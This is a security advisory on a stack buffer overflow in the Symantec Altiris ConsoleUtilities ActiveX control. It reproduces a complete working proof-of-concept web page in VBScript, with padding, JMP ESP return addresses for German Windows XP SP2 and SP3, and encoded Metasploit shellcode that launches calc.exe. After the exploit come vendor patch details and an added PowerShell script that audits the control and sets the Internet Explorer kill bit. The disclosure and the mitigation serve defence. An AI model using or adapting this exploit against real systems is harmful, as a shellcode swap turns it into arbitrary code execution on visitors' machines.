Symantec Altiris ConsoleUtilities ActiveX Control Buffer Overflow Vulnerability

Cause
Boundary condition error
 
Affected systems
Altiris Deployment Solution 6.x
Altiris Notification Server 6.x
Symantec Altiris ConsoleUtilities ActiveX Control 6.x
Symantec Management Platform 7.x
 
Unaffected systems
 
Impact
A remote attacker can exploit this vulnerability to execute arbitrary code with the privileges of the logged-in user's process.
 
Attack prerequisites
The attacker must construct a malicious web page and lure the user into opening it.
 
Vulnerability details
Symantec Altiris Deployment Solution is an automated operating system deployment solution used to deploy and manage servers, desktops and laptops from a single location.
When the administrative web site of the management server for Altiris Deployment Solution and related products is visited for the first time, an ActiveX control (AeXNSConsoleUtilities.dll) is installed. Its "BrowseAndSaveFile" method contains a stack-based buffer overflow:
Name:             ConsoleUtilities Class
Vendor:           Altiris, Inc.
Type:             ActiveX-Steuerelement
Version:          6.0.0.1846
GUID:             {B44D252D-98FC-4D5C-948C-BE868392A004}
File:             AeXNSConsoleUtilities.dll
Folder:           C:\WINDOWS\system32
Submitting an over-long string as an argument to "BrowseAndSaveFile" triggers a stack-based buffer overflow. An attacker can build a malicious web page and lure a user into loading it, thereby executing arbitrary code with the privileges of the application.
 
Test method
<html>
<title>NSOADV-2009-001</title>
<object classid='clsid:B44D252D-98FC-4D5C-948C-BE868392A004' id='obj'/>
</object>
<script language='vbscript'>
Sub Submit_OnClick
   For i=0 to 2
      If document.ret.os(i).checked Then
         target=document.ret.os(i).value
      End If
   Next
   EIP=unescape(target)
   arg1 = ""
   arg3 = ""
   arg4 = ""
   arg5 = ""
   junk=String(310, "A") 'junk
   morejunk=String(18, unescape("%u0041")) 'more junk
   // windows/exec – 224 bytes
   // http://www.metasploit.com
   // Encoder: x86/call4_dword_xor
   // EXITFUNC=seh, CMD=calc.exe
   code=unescape("%uc92b%ue983%ue8ce%uffff%uffff%u5ec0%u7681%ue60e"&_
                 "%u2dad%u8338%ufcee%uf4e2%u451a%u38a4%uade6%ub14d"&_
                 "%u9c03%u5cff%uff6d%ub31d%ua1b4%u6aa6%u26f2%u105f"&_
                 "%u1ae9%u1e67%u52d7%uf81c%u914a%u444c%u81e4%uf90d"&_
                 "%ua029%uff2c%u5d04%u6f7f%uff6d%ub33d%u91a4%ue82c"&_
                 "%ued6d%ubd55%ud926%u3967%ufd36%u70a6%u26fe%u1875"&_
                 "%u7ee7%u04ce%u26af%ub319%u7be7%uc71c%u6dd7%uf981"&_
                 "%ua029%uff2c%u4dde%ucc58%ud0e5%u03d5%u899b%uda58"&_
                 "%u26be%u1c75%u7ee7%ub34b%ue6ea%u60a6%uacfa%ub3fe"&_
                 "%u26e2%ue82c%ue96f%u1c09%uf6bd%u614c%ufcbc%ud8d2"&_
                 "%uf2be%ub377%u46f4%u65ab%uac8c%ubda0%uad5f%u382d"&_
                 "%uc5b6%ub31c%u2a89%uedd2%u535d%u0a23%uc50c%uad8b"&_
                 "%u305b%uedd2%uabda%u3251%u5666%u4dcd%u16e3%u2b6a"&_
                 "%uc294%u3847%u52b5%u5bf8%uc187%u164e%ud583%u3848")
   buf=junk+EIP+morejunk+break+code
   obj.BrowseAndSaveFile arg1, buf, arg3, arg4, arg5
End Sub
</script>
<h2>Symantec ConsoleUtilities ActiveX Control Buffer overflow PoC</h2>
Use it only for education or ethical pentesting! The author accepts no
liability for damage caused by this tool.<br>Nikolas Sotiriu (lofi)
(http://www.sotiriu.de/adv/NSOADV-2009-001.txt), 02.11.2009<br>
<h3>Some RET Infos:</h3>
Overwrite EIP with AAAA (crash)<br>
EIP=String(2, unescape("%u4141"))<br><br>
XP SP2 Ger shell32.dll JMP ESP<br>
EIP=unescape("%uaf0a%u77d5")<br><br>
 
XP SP3 Ger shell32.dll JMP ESP<br>
EIP=unescape("%u30D7%u7E68")<br><br>
—————————————————————-
<form name="ret">
 <input type=radio name="os" value="%u4141%u4141">
    DoS<br>
 <input type=radio name="os" value="%uaf0a%u77d5">
    Windows XP SP2 German<br>
 <input type=radio name="os" value="%u30D7%u7E68">
    Windows XP SP3 German<br>
 <input type=button name="Submit" VALUE="Exploit">
</form>
<img src="http://sotiriu.de/images/logo_wh_80.png">
</html>
 
Vendor solution
Users can apply the vendor-supplied update package Symantec AltirisNSConsole.zip, which is provided for the following products:
Symantec Altiris Deployment Solution 6.9 SP1
Symantec Altiris Deployment Solution 6.9
Symantec Altiris Deployment Solution 6.9 SP3 Build 430
Symantec Altiris Deployment Solution 6.9.164
Symantec Altiris Deployment Solution 6.9.176
Symantec Altiris Deployment Solution 6.9.355
Symantec Altiris Deployment Solution 6.9.355 SP1
Download: https://kb.altiris.com/utility/getfile.asp?rid=6364&aid=49568
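For hosts that cannot take the vendor update immediately, the following added PowerShell script (not part of the advisory or of Symantec's tooling) checks whether the ConsoleUtilities control is registered, reads its file version, and sets the Internet Explorer kill bit for its CLSID so that web pages can no longer instantiate it. The CLSID, DLL name and build 6.0.0.1846 come from the advisory; treating builds at or below that number as vulnerable is an assumption, since the advisory does not name a fixed build.

```powershell
# Added example, not from the advisory or from Symantec. Run in an elevated shell.
# Audits the vulnerable control and applies the IE kill bit as an interim mitigation.

$Clsid        = '{B44D252D-98FC-4D5C-948C-BE868392A004}'   # CLSID from the advisory
$KnownVulnVer = [version]'6.0.0.1846'                      # build listed in the advisory
$KillBitKey   = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"

function Get-ConsoleUtilitiesControl {
    # Resolve the in-process server registered for the CLSID, if any, and its version.
    $reg = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid\InprocServer32"
    if (-not (Test-Path $reg)) { return $null }
    $dll = (Get-ItemProperty -Path $reg).'(default)'
    if (-not ($dll -and (Test-Path $dll))) { return $null }
    $vi  = (Get-Item $dll).VersionInfo
    $ver = [version]"$($vi.FileMajorPart).$($vi.FileMinorPart).$($vi.FileBuildPart).$($vi.FilePrivatePart)"
    [pscustomobject]@{ Path = $dll; Version = $ver }
}

function Test-KillBitSet {
    # Compatibility Flags bit 0x400 is the kill bit: IE refuses to load the control.
    if (-not (Test-Path $KillBitKey)) { return $false }
    $flags = (Get-ItemProperty -Path $KillBitKey).'Compatibility Flags'
    return ($null -ne $flags) -and (($flags -band 0x400) -ne 0)
}

function Set-KillBit {
    # Create the key if needed and OR in 0x400, preserving any flags already present.
    if (-not (Test-Path $KillBitKey)) { New-Item -Path $KillBitKey -Force | Out-Null }
    $existing = (Get-ItemProperty -Path $KillBitKey -ErrorAction SilentlyContinue).'Compatibility Flags'
    $new = ([int]$existing) -bor 0x400
    Set-ItemProperty -Path $KillBitKey -Name 'Compatibility Flags' -Value $new -Type DWord
}

$ctl = Get-ConsoleUtilitiesControl
if ($null -eq $ctl) {
    Write-Output "ConsoleUtilities control $Clsid is not registered on this host."
} elseif ($ctl.Version -le $KnownVulnVer -and -not (Test-KillBitSet)) {
    # Assumption: builds at or below the advisory's build are treated as vulnerable.
    Write-Output "Build $($ctl.Version) at $($ctl.Path) is at or below $KnownVulnVer; setting kill bit."
    Set-KillBit
} else {
    Write-Output "Build $($ctl.Version) at $($ctl.Path); kill bit set: $(Test-KillBitSet)"
}
```

The kill bit only blocks instantiation from Internet Explorer; it does not replace the vendor update, and the flag can be removed once a fixed build is installed.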
 
Credit
Nikolas Sotiriu
